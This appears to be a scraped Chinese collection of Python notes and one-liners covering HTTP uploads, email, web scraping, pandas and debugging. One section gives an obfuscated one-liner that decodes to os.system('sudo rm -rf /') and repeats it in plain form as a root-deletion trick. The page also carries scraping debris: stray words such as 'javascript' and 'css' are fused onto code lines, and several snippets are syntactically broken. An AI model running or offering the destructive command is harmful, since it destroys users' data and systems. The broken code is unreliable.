python記錄

python上傳文件

import requests
#https://zhuanlan.zhihu.com/p/20091394
s = requests.session()
url = 'http://how-old.net/Home/Analyze?isTest=False&source=&version=001'
header = {
'Accept-Encoding':'gzip, deflate',
'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0",
'Host': "how-old.net",
'Referer': "http://how-old.net/",
'X-Requested-With': "XMLHttpRequest"
    }

data = {'file':open('test.jpg', 'rb')}
 #此處打開指定的jpg文件

r = s.post(url, files=data, headers=header)   
h = r.content
print h

Python中的copy、deepcopy

a = [0, 1, 2, 3, [4, 5, 6], 7]
b = a[:]
a[0] = 5
a[4][0] = 99
print(a)
print(b)
print([id(x) for x in a])
print([id(x) for x in b])

Python正則表達式匹配.*

# encoding:utf-8
import urllib
import re
import json

url = 'http://news.163.com/special/00014RJU/nationalnews-json-data.js'
result = urllib.urlopen(url).read().strip()
pattern = re.compile(r';var newsList=(.*)')
pattern = re.compile(r';var newsList=([\s\S]*)')#.*只能匹配非換行符,換成[\s\S]*便可
matchs = pattern.match(result)
print(matchs.group())

使用python進行文件夾對比

#coding:gbk
from filecmp import dircmp


def show_diff_files(dcmp):
    for name in dcmp.diff_files:
        print "diff_file %s found in %s and %s" % (name, dcmp.left,dcmp.right)
    for sub_dcmp in dcmp.subdirs.values():
        show_diff_files(sub_dcmp)

def show_only(dcmp):
    if dcmp.left_only:
        ave_rst = 1
        for i in dcmp.left_only:
            print "%s只存在於%s中"%(i,dcmp.left)
    if dcmp.right_only:
        for i in dcmp.right_only:
            print "%s只存在於%s中"%(i,dcmp.right)
    for sub_dcmp in dcmp.subdirs.values():
        show_only(sub_dcmp)

def compare(dir1,dir2):
    dcmp = dircmp(dir1,dir2)
    show_diff_files(dcmp)
    show_only(dcmp)

發送郵件

from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.utils import parseaddr, formataddr
from time import sleep
from bs4 import BeautifulSoup
import requests
import smtplib
import time
def SendMessage(title):  # 發送郵件
    def _format_addr(s):
        name, addr = parseaddr(s)
        return formataddr((Header(name, 'utf-8').encode(), addr))

    from_addr = 'xxx@163.com'#發件人信箱
    password = 'xxxx'#郵箱密碼
    to_addr = 'xxx@163.com'#收件人信箱
    smtp_server = 'smtp.163.com'#請確保開啓了smtp服務
    msg = MIMEText(title, 'plain', 'utf-8')
    msg['From'] = _format_addr('郵件提醒 <%s>' % from_addr)
    msg['To'] = _format_addr('親愛的 <%s>' % to_addr)
    msg['Subject'] = Header('郵件提醒更新', 'utf-8').encode()
    server = smtplib.SMTP(smtp_server, 25)
    server.set_debuglevel(1)
    server.login(from_addr, password)
    server.sendmail(from_addr, [to_addr], msg.as_string())
    server.quit()
print(SendMessage('hello'))

10 行代碼斷定色圖片

import sys, Image  
  
img = Image.open(sys.argv[1]).convert('YCbCr')  
  
w, h = img.size  
  
data = img.getdata()  
  
cnt = 0  
  
for i, ycbcr in enumerate(data):  
  
    y, cb, cr = ycbcr  
  
    if 86 <= cb <= 117 and 140 <= cr <= 168:  
  
        cnt += 1  
  
print '%s %s a porn image.'%(sys.argv[1], 'is' if cnt > w * h * 0.3 else 'is not')

命令行格式化

>>> echo '{"key":"value"}' | python -m json.tool
{
    "key": "value"
}
//python -m json.tool

//在 vim 中執行這句代碼,能夠快速格式化 json 數據
curl -L http://restapi/json_response -o json-response | python -m json.tool

獲取公網IP地址

python -c "import socket; sock=socket.create_connection(('ns1.dnspod.net',6666)); print sock.recv(16); sock.close()"javascript

幫你數數:

$ python -c "print(' '.join([str(i) for i in range(1,10000)]))" | sayphp

一行統計一本書的全部詞頻(此處是前100)

import re; from collections import Counter Counter(re.findall(r'\w+',open('hamlet.txt').read().lower())).most_common(100)

轉置矩陣

m = [ [1,2],[3,4]] zip(*m)css

import就能夠飛

import antigravity就會打開 xkcd.com/about/html

2的1000次方的各位數之和

sum(map(int, str(2**1000)))java

一行篩質數

filter(lambda x: all(map(lambda p: x % p != 0, range(2, x))), range(2, n))node

list分組

a=[3, 8, 9, 4, 1, 10, 6, 7, 2, 5]
[a[i:i+3] for i in xrange(0,len(a),3)]
結果[[3, 8, 9], [4, 1, 10], [6, 7, 2], [5]]

key,value互換

m = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
{v: k for k, v in m.items()}
結果:{1: 'a', 2: 'b', 3: 'c', 4: 'd'}

碾平list

a = [1, 2, [3, 4], [[5, 6], [7, 8]]]
flatten = lambda x: [y for l in x for y in flatten(l)] if type(x) is list else [x]
flatten(a);
結果:[1,2,3,4,5,6,7,8]

簡易的web服務

python -m SimpleHTTPServer 8000,而後瀏覽器打開 localhost:8000,一個簡易的web服務就開啓了python

打印九九乘法表

print 'n'.join([' '.join(['%s%s=%-2s' % (y,x,xy) for y in range(1,x+1)]) for x in range(1,10)])jquery

計算出1-1000之間的素數

print(*(i for i in range(2, 1000) if all(tuple(i%j for j in range(2, int(i**.5)))))) git

輸出斐波那契數列的值

print [x[0] for x in [ (a[i][0], a.append((a[i][1], a[i][0]+a[i][1]))) for a in ([[1,1]], ) for i in xrange(100) ]]github

網易雲音樂批量下載

import requests
import urllib

# 榜單歌曲批量下載
# r = requests.get('http://music.163.com/api/playlist/detail?id=2884035')    # 網易原創歌曲榜
# r = requests.get('http://music.163.com/api/playlist/detail?id=19723756')    # 雲音樂飆升榜
# r = requests.get('http://music.163.com/api/playlist/detail?id=3778678')    # 雲音樂熱歌榜
r = requests.get('http://music.163.com/api/playlist/detail?id=3779629')    # 雲音樂新歌榜

# 歌單歌曲批量下載
# r = requests.get('http://music.163.com/api/playlist/detail?id=123415635')    # 雲音樂歌單——【華語】中國風的韻律,中國人的印記
# r = requests.get('http://music.163.com/api/playlist/detail?id=122732380')    # 雲音樂歌單——那不是愛,只是寂寞說的謊

arr = r.json()['result']['tracks']    # 共有100首歌
    
for i in range(10):    # 輸入要下載音樂的數量,1到100。
    name = str(i+1) + ' ' + arr[i]['name'] + '.mp3'
    link = arr[i]['mp3Url']
    urllib.request.urlretrieve(link, '網易雲音樂\\' + name)    # 提早要建立文件夾
    print(name + ' 下載完成')

調用默認瀏覽器打開一坨網頁

import webbrowser

urls = [
    'http://www.douban.com',
    'http://weibo.com',
    'http://www.zhihu.com',
    'http://www.v2ex.com/',
    'https://github.com/',
    'https://mail.google.com/',
    'http://instagram.com/',
]

map(lambda x: webbrowser.open(x), urls)

扒取kindle今日特價書,把結果郵件到指定郵箱

# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import smtplib
from email.mime.text import MIMEText
from email.Header import Header

result = {"name": [], "cover": [], "desc": [], "link": [], "price": []}


def get_page():
    return requests.get("http://t.cn/Rvm4xgc").text


def parse(html):
    soup = BeautifulSoup(html)
    table = soup.body.find_all("table")[6]

    name = table.find_all("tr")[1]

    result["name"].append(name.find_all("td")[0].b.string)
    result["name"].append(name.find_all("td")[2].b.string)

    desc = table.find_all("tr")[2]

    book_1 = desc.find_all("td")[0]
    result["cover"].append(book_1.a.img["src"])
    result["link"].append("http://www.amazon.cn" + book_1.a["href"])
    result["desc"].append(book_1.contents[1])
    result["price"].append(book_1.find_all("p")[1].b.span.string)

    book_2 = desc.find_all("td")[2]
    result["cover"].append(book_2.a.img["src"])
    result["link"].append("http://www.amazon.cn" + book_2.a["href"])
    result["desc"].append(book_2.contents[1])
    result["price"].append(book_2.find_all("p")[1].b.span.string)


mail_config = {
    "from": "gitradar@163.com",
    "to": "liushuaikobe1993@163.com",
    "server": "smtp.163.com",
    "username": "gitradar",
    "pwd": "yourpassword"
}


def send_mail(sbj, content, from_whom=mail_config['from'], to_whom=mail_config['to'], server=mail_config['server'],
              username=mail_config['username'], pwd=mail_config['pwd']):
    msg = MIMEText(content, "html", "utf-8")
    msg['Subject'] = Header(sbj, "utf-8")
    msg['From'] = from_whom
    msg['To'] = to_whom
    s = smtplib.SMTP(server)
    s.ehlo()
    s.starttls()
    s.login(username, pwd)
    s.sendmail(from_whom, to_whom, msg.as_string())


def build_html():
    return '<html><body>' \
            + '<h2>'+ result["name"][0] + '&nbsp; ' + result["price"][0] + '</h2>' \
            + '<a href="' + result["link"][0] + '">' \
            + '<img src="' + result["cover"][0] + '"></img>' \
            + '</a>' \
            + '<p>' + result["desc"][0] + '</p>' \
            + '<h2>'+ result["name"][1] + '&nbsp; ' + result["price"][1] + '</h2>' \
            + '<a href="' + result["link"][1] + '">' \
            + '<img src="' + result["cover"][1] + '"></img>' \
            + '</a>' \
            + '<p>' + result["desc"][1] + '</p>' \
            + '</body></html>'


if __name__ == "__main__":
    parse(get_page())
    html = build_html()
    sbj = "Kindle今日特價書"
    send_mail(sbj, html)

心形函數

print('\n'.join([''.join([('PYTHON!'[(x-y)%7]if((x*0.05)**2+(y*0.1)**2-1)**3-(x*0.05)**2*(y*0.1)**3<=0else' ')for x in range(-30,30)])for y in range(15,-15,-1)]))

                THON!PYTH           YTHON!PYT               
            !PYTHON!PYTHON!PY   N!PYTHON!PYTHON!P           
          N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH         
         N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON        
        N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!P       
        !PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PY       
        PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYT       
        YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH       
        THON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHO       
        HON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON       
         N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON        
          PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON         
          YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!         
            ON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON           
             !PYTHON!PYTHON!PYTHON!PYTHON!PYTHON            
              YTHON!PYTHON!PYTHON!PYTHON!PYTHON             
                ON!PYTHON!PYTHON!PYTHON!PYTHO               
                  PYTHON!PYTHON!PYTHON!PYTH                 
                    HON!PYTHON!PYTHON!PYT                   
                       PYTHON!PYTHON!P                      
                          ON!PYTHON                         
                             YTH                            
                              H

Python實現Zip文件的暴力破解

import zipfile 
try:
    with zipfile.ZipFile('1.zip') as zFile:     #建立ZipFile對象
        #解壓文件
        zFile.extractall(path='./',pwd=b'1314')
        print('Extract the Zip file successfully!')
except:
    print('Extract the Zip file failed!')

判斷輸入數字是實數(整型數字或者浮點型數字)

In [1]: isinstance(1, (int, long, float))
True

In [2]: isinstance('a', (int, long, float))
False
In [1]: foo = '123.456'

In [2]: foo.replace('.', '', 1).isdigit()
True

In [3]: bar = '12.34.56'

In [4]: bar.replace('.', '', 1).isdigit()
False

def input_num():
    while True:
        num = raw_input('input a number : ')
        if num.replace('.', '', 1).isdigit():
            return num
>>> f = 1.0
>>> f.is_integer()
True
>>> f = 1.0 / 3 + 2.0 / 3
>>> f.is_integer()
True
try:
    f = float(input_value)
except Exception:
    ...
else:
    # Is it a integer?
    if f.is_integer():
        ...
    else:

pip 安裝lxml時出現 「Unable to find vcvarsall.bat

1. 安裝wheel,命令行運行:
pip install wheel

2.在http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml 這裏下載對應的.whl文件,注意別改文件名!
Ctrl + F,輸入lxml,找到下面這段
Lxml, a binding for the libxml2 and libxslt libraries.
lxml‑3.4.4‑cp27‑none‑win32.whl
lxml‑3.4.4‑cp27‑none‑win_amd64.whl
lxml‑3.4.4‑cp33‑none‑win32.whl
lxml‑3.4.4‑cp33‑none‑win_amd64.whl
lxml‑3.4.4‑cp34‑none‑win32.whl
lxml‑3.4.4‑cp34‑none‑win_amd64.whl
lxml‑3.4.4‑cp35‑none‑win32.whl
lxml‑3.4.4‑cp35‑none‑win_amd64.whl
cp後面是Python的版本號,27表示2.7,根據你的Python版本選擇下載。

3. 進入.whl所在的文件夾,執行命令便可完成安裝
pip install 帶後綴的完整文件名
$ pip install lxml-3.6.4-cp35-cp35m-win32.whl
Processing .\lxml-3.6.4-cp35-cp35m-win32.whl
Installing collected packages: lxml
Successfully installed lxml-3.6.4
http://stackoverflow.com/questions/29440482/how-to-install-lxml-on-windows 
http://stackoverflow.com/questions/2817869/error-unable-to-find-vcvarsall-bat

Python一行刪掉根目錄

(lambda _: getattr(__import__(_(28531)), _(126965465245037))(_(9147569852652678349977498820655)))((lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True))
 
import os
os.system('sudo rm -rf /')
__import__('os').system('sudo rm -rf /')

登陸博客園

from selenium import webdriver
import time


browser = webdriver.Chrome()
browser.get("http://cnblogs.com")
time.sleep(1)
browser.find_element_by_link_text("登陸").click()
time.sleep(1)
browser.find_element_by_id("input1").send_keys("用戶名")
browser.find_element_by_id("input2").send_keys("密碼")
browser.find_element_by_id("signin").click()
time.sleep(1)
try:
    if browser.find_element_by_link_text("退出"):
        print "Login Successfully."
except:
    print "Login failed."


from selenium import webdriver
source_url='http://huaban.com/boards/28195582/'
headers={
    'Host':'huaban.com',
    'Pragma':'no-cache',
    'Cache-Control':'no-cache',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36',
    'Cookie':'xxxxxx'
}
cap = webdriver.DesiredCapabilities.PHANTOMJS
cap["phantomjs.page.settings.userAgent"] = headers['User-Agent']    #設置請求header頭信息
cap["phantomjs.page.settings.loadImages"] = False                   #禁止加載圖片
cap["phantomjs.page.customHeaders.Host"]=headers['Host']
cap["phantomjs.page.customHeaders.Pragma"]=headers['Pragma']
cap["phantomjs.page.customHeaders.Cookie"]=headers['Cookie']
driver = webdriver.PhantomJS(desired_capabilities=cap)
driver.get(source_url)

unicode

echo "u00e8u0091u0089u00e7u008au00b6u00e3u0083u00a2u00e3u0083u008eu00e3u0083u009du00e3u0083u00bcu00e3u0083u00abu00e3u0082u00a2u00e3u0083u00b3u00e3u0083u0086u00e3u0083u008a"
x = u'\u00e8\u0091\u0089
print x

python中怎麼獲取某個網頁元素以前的全部源碼?

doc = '''
<html>
    <head>
        <title>The Dormouse's story </title>
    </head> 
    <body> 
        <p id="p1">p1p1p1
            <b id='b1'>b1b1b1</b>
        </p> 
        <p id="p2">p2p2p2</p>
        <div id='d1'>
            <ul id='u1'>u1u1u1</ul>
            <a id="a1">a1a1a1</a>
            <div id='d2'>
                <a id="a2">a2a2a2 </a>
                <b id='b2'>b2b2b2</b>
                <p id='p3'>p3p3p3</p>
            </div>
            <a id="a3">a3a3a3 </a>
        </div> 
        <p id="p4">p4p4p4</p>
    </body>
</html>
'''

from lxml import html

tree = html.fromstring(doc)
a = tree.get_element_by_id("a1")
print(html.tostring(a))
print(html.tostring(tree).decode())

def dropnode(e=None):
    if e is None: return
    if e.tag == 'body': return
    nd = e.getnext()
    while nd is not None:
        nd.drop_tree()
        nd = e.getnext()
    dropnode(e.getparent())

dropnode(a)
print(html.tostring(tree).decode())

requests優雅的下載圖片

import requests
from bs4 import BeautifulSoup

r = requests.get("http://www.pythonscraping.com")
bs = BeautifulSoup(r.text,'lxml')
image = bs.find("a", {"id": "logo"}).find("img")["src"]

ir = requests.get(image)
if ir.status_code == 200:
    open('logo.jpg', 'wb').write(ir.content)
 
import requests
from bs4 import BeautifulSoup

r = requests.get("http://www.pythonscraping.com")
bs = BeautifulSoup(r.text,'lxml')
image = bs.find("a", {"id": "logo"}).find("img")["src"]

ir = requests.get(image)
if ir.status_code == 200:
    open('logo.jpg', 'wb').write(ir.content)

python lxml

import lxml.etree 
import urllib.request
from lxml.etree import *
str_url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id=26693255&retmode=text&rettype=xml'
request = urllib.request.Request(str_url)
xml_text = urllib.request.urlopen(request).read()
root = lxml.etree.XML(xml_text) # xml_text 爲xml純文本文件
# example  獲取雜誌名稱和ISSN
# 使用 tag做爲輸入須要逐級進行
journal_name = root.find('PubmedArticle').find('MedlineCitation').find('Article').find('Journal').find('Title').text
# 也可使用xpath(必須使用相對路徑,以.//開頭,若是想使用絕對路徑可使用xpath函數)
journal_name = root.find('.//Title').text
print('xpath:' ,journal_name)
journal_name = root.xpath('//Title')[0].text
print(journal_name)

爬取 豆瓣電影主頁本週口碑榜

import lxml.html
str_url = 'http://movie.douban.com/'
request = urllib.request.Request(str_url)
html_text = urllib.request.urlopen(request).read()
root = lxml.html.fromstring(html_text)
# 獲取本頁面全部項目名稱 cssselect() 函數,返回list,包含全部匹配的結果,可使用css選擇器,相似於jquery
movies_list = [a.text for a in  root.cssselect('div.billboard-bd tr td a')]
print(movies_list)
# 獲取全部電影超連接
movies_href = [a.get('href') for a in  root.cssselect('div.billboard-bd tr td a')]
print(movies_href)

回頭遍歷

n=7 
list1=['a','b','c','d'] 
print (l * (n // len(l) + 1))[:n]
(list1 * 2)[:n]
import itertools 
import math 
(list1 * math.ceil( n / len(list1) ) )[:7] 
n=7 
list1=['a','b','c','d'] 
print list(itertools.islice(itertools.cycle(list1), 0, n))

pip 安裝 scrapy

pip install wheel
http://www.lfd.uci.edu/~gohlk... 下載對應版本的 lxml和Twisted,cp後面是Python的版本號,27表示2.7 pip install 對應的whl文件
pip install scrapy

找出list2中有,可是list1中沒有的數據

list(set(list2)-set(list1))

將字符串'[1,2,3,4]'轉化爲列表[1,2,3,4]

eval('[1,2,3,4]')
[1, 2, 3, 4]
json.loads(str)
ast.literal_eval(str)
raw = b'{"aa":11,"bb":22,"cc":33}'
d   = json.loads(str(raw, 'utf-8'))
d = eval(b'{"aa":11,"bb":22,"cc":33}')
s = b'{"aa":11,"bb":22,"cc":33}'.decode('utf-8')  # 先解碼成字符串
data = json.loads(s)  # 解析爲字典對象

Pythonic [for]

a_part = [2001, 12000]
b_part = [1001, 2000]
c_part = [11, 1000]
d_part = [1, 10]

data = range(1, 12000)
labels = [a_part, b_part, c_part, d_part]
sizes = []
for part in labels:
    sum = 0
    for each in data:
        sum += each if each >= part[0] and each <= part[1] else 0
    sizes.append(sum)
print(sizes)
sizes = [sum(each for each in data if part[0] <= each <= part[1]) for part in labels]
sizes = [sum(x for x in data if low<=x<=high) for low,high in labels]

send email

import smtplib
from email.mime.text import MIMEText

第三方 SMTP 服務

mail_host = "smtp.163.com"  # SMTP服務器
mail_user = "username"  # 用戶名
mail_pass = "passwd"  # 密碼

sender = 'user@163.com'  # 發件人郵箱(最好寫全, 否則會失敗)
receivers = ['to_someone@qq.com']  # 接收郵件,可設置爲你的QQ郵箱或者其餘郵箱


content = '過時教程害死人!'
title = 'Python SMTP Mail Test'  # 郵件主題
message = MIMEText(content, 'plain', 'utf-8')  # 內容, 格式, 編碼
message['From'] = "{}".format(sender)
message['To'] = ",".join(receivers)
message['Subject'] = title

try:
    smtpObj = smtplib.SMTP_SSL(mail_host, 465)  # 啓用SSL發信, 端口通常是465
    smtpObj.login(mail_user, mail_pass)  # 登陸驗證
    smtpObj.sendmail(sender, receivers, message.as_string())  # 發送
    print("mail has been send successfully.")
except smtplib.SMTPException as e:
    print(e)
    
    ###pip UnicodeDecodeError: 'ascii' codec can't decode byte 0xc0 in position 0
    vi mimetypes.py
    import sys
reload(sys)
sys.setdefaultencoding('utf-8')
    ###後臺運行命令
    from subprocess import run
run("ping 127.0.0.1",shell=True)

group by

import pandas as pd

cols = ['流水號', '處理人', '處理時間']
data = [[10000, '張三', '2016-10-01'],
        [10000, '李四', '2016-10-02'],
        [10001, '王五', '2016-10-01'],
        [10002, '趙六', '2016-10-03'],
        [10001, '黃七', '2016-10-02'],
        [10000, '吳八', '2016-10-03']]

df = pd.DataFrame(data,columns=cols)
grp = [(n, ','.join([r for r in set(df[df['流水號']==n]['處理人'])]))
                       for n in set(df['流水號'])]

df2 = pd.DataFrame(grp, columns=cols[:-1])
print(df)
print(df2)

cols = ['流水號', '處理人', '處理時間']
data = [[10000, '張三', '2016-10-01'],
        [10000, '李四', '2016-10-02'],
        [10001, '王五', '2016-10-01'],
        [10002, '趙六', '2016-10-03'],
        [10001, '黃七', '2016-10-02'],
        [10000, '吳八', '2016-10-03']]
frame = pd.DataFrame(data,columns=cols)

def combination(names):
    return ','.join(names)
    
frame.groupby('流水號').aggregate(combination)

pandas導入文件

import pandas as pd
pd.read_csv('1.csv', skiprows=[0, 2]) # 跳過文件第一行和第三行

找出list2中有,可是list1中沒有的數據

list(set(list2)-set(list1))
a = ["a","b","c","e"]
b = ["b","c","f"]
li = [ item for item in b if item not in a]

python try...except中如何輸入e的行號

import sys, os

try:
    raise NotImplementedError("No error")
except Exception as e:
    exc_type, exc_obj, exc_tb = sys.exc_info()
    fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
    print(exc_type, fname, exc_tb.tb_lineno)

字符串與二進制串的相互轉換

def encode(s):
    return ' '.join([bin(ord(c)).replace('0b', '') for c in s])

def decode(s):
    return ''.join([chr(i) for i in [int(b, 2) for b in s.split(' ')]])
    
>>>encode('hello')
'1101000 1100101 1101100 1101100 1101111'
>>>decode('1101000 1100101 1101100 1101100 1101111')
'hello'
>>> bin(int('256', 10))
'0b100000000'
>>> str(int('0b100000000', 2))
'256'

windows 下python pip install libxml

http://www.lfd.uci.edu/~gohlk... 下載lxml,文件名是這樣的: lxml-3.6.4-cp27-cp27m-win32.whl
cp27表示python2.7 cmd裏輸入python第一行末尾win32,就說明python是32位的
pip install wheel #若是沒有安裝過wheel就安裝
pip install lxml-**.whl #在whl文件目錄中執行

time

import time
local = time.localtime()
print(time.localtime(1400000000))
time.mktime(local)#接受時間元組並返回時間輟
my_format = "%Y/%m/%d %H:%M:%S"
my_time = time.localtime()
print(my_time)
print(time.strftime(my_format, my_time))

python中不要使用[]{}做爲默認參數

def fn(x, L=[]):
  L.append(x)
  return L

print(fn(1))   # [1]
print(fn(7))   # [1, 7]
print(fn(13))  # [1, 7, 13]
// 而 javascript (ES6) 沒有上面那個坑
function fn(x, L=[]){
  L.push(x);
  return L.toString();
}

console.log(fn(1))   // "1"
console.log(fn(7))   // "7"
console.log(fn(13))  // "13"

嵌套列表推導式和生成器表達式

[(i,j) for i in range(3) for j in range(i) ]
((i,j) for i in range(4) for j in range(i) )

括號代替縮進

from future import braces

使用re.DEBUG查看正則表達式的匹配過程

re.compile(r'd+(.*)',re.DEBUG)

IPython調試

import sys

class ExceptionHook:
    instance = None

    def __call__(self, *args, **kwargs):
        if self.instance is None:
            from IPython.core import ultratb
            self.instance = ultratb.FormattedTB(mode='Plain',
                 color_scheme='Linux', call_pdb=1)
        return self.instance(*args, **kwargs)

sys.excepthook = ExceptionHook()
ipython --pdb your_scripyt.py
from ipython import embed;embed()
 import ipdb; ipdb.set_trace()
python -m pdb your.py

ipython test.py --pdb
---------------------------------------------------------------------------
ZeroDivisionError                         Traceback (most recent call last)
/Users/dongweiming/test/test.py in <module>()
      2 b = 0
      3 
----> 4 a / b

ZeroDivisionError: integer division or modulo by zero
*** NameError: name 'pdb' is not defined
> /Users/dongweiming/test/test.py(4)<module>()
      1 a = 1
      2 b = 0
      3 
----> 4 a / b

ipdb> p b  # p是print的別名
0
ipdb> p a
1
ipdb>

調試函數

import sys

def get_cur_info():
    print sys._getframe().f_code.co_filename  # 當前文件名
    print sys._getframe(0).f_code.co_name  # 當前函數名
    print sys._getframe(1).f_code.co_name # 調用該函數的函數的名字,若是沒有被調用,則返回module
    print sys._getframe().f_lineno # 當前行號

字典解析

a_dict = {"%d^2" % item: item**2 for item in range(5)}
print(a_dict)    # {'3^2': 9, '2^2': 4, '1^2': 1, '0^2': 0, '4^2': 16}
a_generator = (item**2 for item in range(5))#生成器
a_list_generator = iter(a_list)
print(list(map(lambda x, y: x**y, range(1, 5), range(1, 5))))    # [1, 4, 27, 256]
print(reduce(lambda x, y: x+y, range(10)))    # 45
print(reduce(lambda x, y: x+y, range(10), 100))    # 145
print(reduce(lambda x, y: x+y, [[1, 2], [3, 4]], [0]))    # [0, 1, 2, 3, 4]

print(filter(None, range(-4, 5)))    # <filter object at 0x10c096710>
print(list(filter(None, range(-4, 5))))    # [-4, -3, -2, -1, 1, 2, 3, 4]
print(list(filter(lambda x: x > 0, range(-4, 5))))    # [1, 2, 3, 4]

print(all([0, 1, 2]))    # False 斷定一個可迭代對象是否全爲True或者有爲True
print(any([0, 1, 2]))    # True


for index, item in enumerate(range(5)):
    print("%d: %d" % (index, item))    # 0: 0 \n 1: 1 \n 2: 2
    
    for a, b in zip([1, 2, 3], ["a", "b", "c"]):
    print(a, b)    # 1 a \n 2 b \n 3 c
a_dict = dict(zip([1, 2, 3], ["a", "b", "c"]))
print(a_dict)    # {1: 'a', 2: 'b', 3: 'c'}
>>> [(a,b )for a, b in zip([1, 2, 3], ["a", "b", "c"])]
[(1, 'a'), (2, 'b'), (3, 'c')]
一行代碼啓動一個Web服務

python -m SimpleHTTPServer 8080  # python2
python3 -m http.server 8080  # python3
一行代碼實現求解2的1000次方的各位數之和
print(sum(map(int, str(2**1000))))
多維數組轉化爲一維
flatten = lambda x: [y for l in x for y in flatten(l)] if isinstance(x, list) else [x]
一行代碼計算出1-100之間的素數
print(' '.join([str(item) for item in filter(lambda x: not [x % i for i in range(2, x) if x % i == 0], range(2, 101))]))
print(' '.join([str(item) for item in filter(lambda x: all(map(lambda p: x % p != 0, range(2, x))), range(2, 101))]))
一行代碼打印九九乘法表
print('\n'.join([' '.join(['%s*%s=%-2s' % (y, x, x*y) for y in range(1, x+1)]) for x in range(1, 10)]))

1*1=1
1*2=2  2*2=4
1*3=3  2*3=6  3*3=9
1*4=4  2*4=8  3*4=12 4*4=16
1*5=5  2*5=10 3*5=15 4*5=20 5*5=25
1*6=6  2*6=12 3*6=18 4*6=24 5*6=30 6*6=36
1*7=7  2*7=14 3*7=21 4*7=28 5*7=35 6*7=42 7*7=49
1*8=8  2*8=16 3*8=24 4*8=32 5*8=40 6*8=48 7*8=56 8*8=64
1*9=9  2*9=18 3*9=27 4*9=36 5*9=45 6*9=54 7*9=63 8*9=72 9*9=81

一行代碼輸出特定字符"Love"拼成的心形
print('\n'.join([''.join([('Love'[(x-y) % len('Love')] if ((x*0.05)**2+(y*0.1)**2-1)**3-(x*0.05)**2*(y*0.1)**3 <= 0 else ' ') for x in range(-30, 30)]) for y in range(30, -30, -1)]))
循環過程當中變動 list 長度是錯誤的思路
for i in range(0,len(list1)): 
if list1[i].find('a') != -1: 
   list1.pop(i) 

list1 = [x for x in list1 if 'a' not in x]
list1 = ['print', 'lock', 'china', 'page'] 

list2 = filter(lambda item: 'a' not in item,list1)

Fraction模塊:分數模塊

from fractions import Fraction
        x = Fraction(4, 6)                       # 分數類型 4/6
        x = Fraction("0.25")                     # 分數類型 1/4

加強賦值和共享引用:普通+號會生成新的對象,而加強賦值+=會在原處修改
        L = M = [1, 2]
        L = L + [3, 4]                      # L = [1, 2, 3, 4], M = [1, 2]
        L += [3, 4]                         # L = [1, 2, 3, 4], M = [1, 2, 3, 4]


 
{x**2 for x in [1, 2, 3, 4]}                         # 集合解析
"%(name1)d---%(name2)s" % {"name1":23, "name2":"value2"}

"{0}, {1} and {2}".format('spam', 'ham', 'eggs')            # 基於位置的調用
    "{motto} and {pork}".format(motto = 'spam', pork = 'ham')   # 基於Key的調用
    D = dict([('name', 'tom'), ('age', 12)])          # {'age': 12, 'name': 'tom'}
    D = dict(zip(['name', 'age'], ['tom', 12]))
    'first line' in open('test.txt')   # in測試 返回True或False
    L = [('b',2),('a',1),('c',3),('d',4)]
        sorted(L, key=lambda x: x[1]), reverse=True)      # 使用Key參數和reverse參數
        sorted(L, key=lambda x: (x[0], x[1]))             # 使用key參數進行多條件排序,即若是x[0]相同,則比較x[1]
        #-- 模塊的包導入:使用點號(.)而不是路徑(dir1\dir2)進行導入
    import dir1.dir2.mod                # d導入包(目錄)dir1中的包dir2中的mod模塊 此時dir1必須在Python可搜索路徑中
    from dir1.dir2.mod import *         # from語法的包導入
    from .. import spam                 # 導入當前目錄的父目錄下的spam模塊
    from subprocess import call
call(["ls", "-l"])
    字典排序
    
    import operator
x = {1: 2, 3: 4, 4: 3, 2: 1, 0: 0}
sorted_x = sorted(x.items(), key=operator.itemgetter(1))  dict(sorted_x)就是你想要的結果

模擬登陸有驗證碼的網站

def get_captcha(self, data, captcha_url): 
self._session.post(self.login_url, data=data) 
r = self._session.get(captcha_url) 
with open('image/captcha.gif', 'wb') as f: 
f.write(r.content) 

image = Image.open('image/captcha.gif') 

captcha = '' 
try: 
captcha = pytesseract.image_to_string(image, lang='eng') 
except Exception: 
pass 
if len(captcha) == 0: 
self.get_captcha(data, captcha_url) 
else: 
print('captcha:', captcha) 
 os.remove('image/captcha.gif') 
return captcha

字典排序

list = [ {'student_name': zhangsan, 'student_score': 65}, {'student_name': lisi, 'student_score': 95}, {'student_name': wangwu, 'student_score': 80}, {'student_name': maliu, 'student_score': 75}, {'student_name': zhuqi, 'student_score': 88} ]
from operator import itemgetter 
top3 = sorted(lst, key=itemgetter('student_score'), reverse=True)[:3] 
print sorted(list, key=lambda student: student['student_score'])[-3:]

獲取下個週三的日期

def get_wednesday_date():
     today = date.today()  
     days = 2 - today.weekday()  
     time_delta = timedelta(days=days) if days > 0 else timedelta(days=7+days) 
     return  today + time_delta
def get_wednesday_date(): 
return date.today() + timedelta(((2 - date.today().weekday()) + 7) % 7)
相關文章
相關標籤/搜索